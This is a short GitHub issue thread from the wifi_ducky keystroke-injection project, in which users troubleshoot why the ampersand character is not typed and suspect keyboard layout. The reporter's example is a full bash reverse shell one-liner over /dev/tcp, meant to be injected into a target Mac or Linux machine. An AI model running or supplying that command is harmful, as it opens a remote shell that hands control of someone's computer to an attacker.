spacehuhn/wifi_ducky #36: ampersand ?

beamzer, 2017-06-10:
It looks like the use of ampersand (&) is not supported? On the Rubber Ducky it works as expected when you use it after STRING, even though it's not mentioned in the wiki as a possible character to use.

For instance, to get a reverse shell on Mac or Linux:
`bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 &`

But with this code it doesn't come through?

supersjimmie, 2017-06-19:
On the "normal" keyboard of the target computer, is the ampersand the Shift-7 key?

spacehuhn, 2017-06-19:
Yep. `SHIFT 7` should do the trick.
[image]

supersjimmie, 2017-06-19:
I mean: on the @beamzer computer where it's not working, what keyboard is configured/used there.